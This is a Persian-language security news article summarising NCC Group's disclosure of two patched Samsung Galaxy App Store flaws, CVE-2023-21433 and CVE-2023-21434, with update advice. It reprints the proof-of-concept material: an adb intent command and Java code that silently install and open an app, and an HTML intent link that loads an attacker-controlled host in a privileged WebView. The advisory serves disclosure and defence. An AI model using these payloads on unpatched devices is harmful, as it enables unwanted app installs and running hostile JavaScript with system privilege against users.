Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • آسیب پذیری امنیتی
  • اخبار

دو آسیب پذیری در Galaxy App Store

On بهمن 2, 1401فروردین 28, 1402
seyyid
Share
زمان مطالعه: 2 دقیقه

محققای NCCGROUP بین 23 نوامبر و 3 دسامبر دو آسیب پذیری به شناسه CVE-2023-21433 و CVE-2023-21434 در برنامه Galaxy App Store کشف و گزارش دادن، که امکان نصب برنامه و اجرای کد جاوااسکریپت رو فراهم میکنن.

سامسونگ با ارائه نسخه 4.5.49.8 در اول ژانویه 2023 این دو آسیب پذیری رو اصلاح کرده.

حالا NCCGROUP یه رایتآپ از این آسیب پذیری ها بهمراه PoC منتشر کرده که بخش هایی از اون رو اینجا مرور میکنیم.

برنامه Galaxy App Store ، فروشگاه رسمی برنامه ها برای محصولات سامسونگ هستش و جایگزین Google App Store هستش ، که روی محصولات اندرویدی این شرکت نصب میشه.

 

آسیب پذیری CVE-2023-21433 :

آسیب پذیری امکان نصب برنامه بدون اجازه کاربر از Galaxy App Store رو فراهم میکنه.  مهاجم میتونه با ترغیب کاربر برای نصب یه برنامه مخرب ، از این آسیب پذیری سوء استفاده کنه.

مهاجم میتونه با نصب برنامه ها بدون اجازه ، میزان نصب اونها رو افزایش بده ،با دید تبلیغاتی یا معتبر کردن برنامه های مخرب.

 

نسخه های تحت تاثیر :

نسخه 4.5.44.1 Galaxy App Store تحت تاثیر این آسیب پذیری هستش. البته عنوان شده که ممکنه نسخه های دیگه هم تحت تاثیر باشن.

نکته : به دلیل یسری ویژگی در نسخه 13 اندروید ، آسیب پذیری فقط روی گوشی هایی که اندروید 12 و پایینتر رو دارن، تاثیر میزاره.

 

POC :

با استفاده از دستور adb ، برنامه Pokemon Go رو روی گوشی نصب میکنه:

1
am start -n com.sec.android.app.samsungapps/.detail.alleypopup.AlleyDetailActivity --es GUID com.nianticlabs.pokemongo.ares --ez directInstall true --ez directOpen tru

 

کدهای جاوا زیر هم همین کار انجام میدن :

Java
1
2
3
4
5
6
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.sec.android.app.samsungapps", "com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity"));
intent.putExtra("GUID", "com.nianticlabs.pokemongo.ares");
intent.putExtra("directInstall", true);
intent.putExtra("directOpen", true);
startActivity(intent);

 

این PoC این قبلیت رو هم به مهاجم میده که بعد از نصب برنامه ، اونو اجرا کنه یا نه.

 

توصیه ها:

توصیه شده اگه از نسخه های اندروید 12 و پایینتر استفاده میکنید حتما نسخه جدید Galaxy App Store رو نصب کنید. همچنین توصیه شده اگرچه نسخه های 13 اندروید تحت تاثیر این آسیب پذیری نیستن برای پیامدهای بعدی ،بازم نسخه جدید رو نصب کنن.

 

 

آسیب پذیری CVE-2023-21434 :

مولفه webview در Galaxy App Store دارای یه فیلتری هستش که دامنه هایی که میشه در webview دید رو محدود میکنه. به دلیل پیکربندی اشتباه این فیلترها ، امکان دور زدنشون وجود داره.

مهاجم میتونه با ارسال لینک مخرب و ترغیب کاربر برای باز کردن در کروم یا نصب برنامه مخرب ، از این آسیب پذیری سوء استفاده کنه و یه صفحه با کدهای جاوااسکریپت مخرب با امتیاز system رو ، روی هدف اجرا کنه. مثلا لوکیشن گوشی رو تشخیص بده.

 

نسخه تحت تاثیر :

آسیب پذیری در نسخه 4.5.48.3 این برنامه هستش اما ممکنه نسخه های دیگه رو هم تحت تاثیر بزاره.

 

PoC :

در PoC زیر بخش host باید با دامنه ای که تحت کنترل مهاجم هست جایگزین بشه. این دامنه باید HTTPS هم داشته باشه. همچنین باید player.glb.samsung-gamelauncher.com رو هم داشته باشه. برای مثال دامنه زیر یک دامنه معتبر هستش:

 

1
player.glb.samsung-gamelauncher.com.nccgroup.com

1
<h1> <a id="yayidyay" rel="noreferrer" href="intent://cloudgame/monitor?monitoringHost=<host>#Intent;action=android.intent.action.VIEW;package=com.sec.android.app.samsungapps;scheme=normalbetasamsungapps;S.android%2eintent%2eextra%2eREFERRER_NAME=http://com.sec.android.app.samsungapps;end"> YAYPOCYAY</a> </h1>

توصیه ها:

توصیه شده برای جلوگیری از اکسپلویت این آسیب پذیری ، نسخه Galaxy App Store گوشی رو بروز کنید.

 

منبع

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آسیب پذیری امنیتی اخبارIn اندروید

راهبری نوشته

آسیب پذیری iTLB multihit در پردازنده های اینتل
اصلاح آسیب پذیری با شدت بالا در محصولات سیسکو

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

پست های مرتبط

  • آسیب پذیری امنیتی
  • اخبار
  • باگ بانتی
  • توسعه اکسپلویت
seyyid
On اردیبهشت 13, 1402اردیبهشت 14, 1402

بازنویسی کتابخونه های ویندوز با Rust برای امنیت بیشتر

  • آسیب پذیری امنیتی
  • اخبار
  • توسعه اکسپلویت
seyyid
On آذر 22, 1402

بررسی Patch Tuesday مایکروسافت برای دسامبر 2023 (آذر 1402)

  • آنالیز بدافزار
  • اخبار
  • بازیگران تهدید
  • مقالات
seyyid
On آذر 17, 1403

روح هکرهای روسی در کالبد هکرهای پاکستانی

  • اخبار
  • افشای اطلاعات
seyyid
On فروردین 7, 1402فروردین 28, 1402

افشای بخشی از سورس کد توییتر روی گیتهاب

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei Off By One Security out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404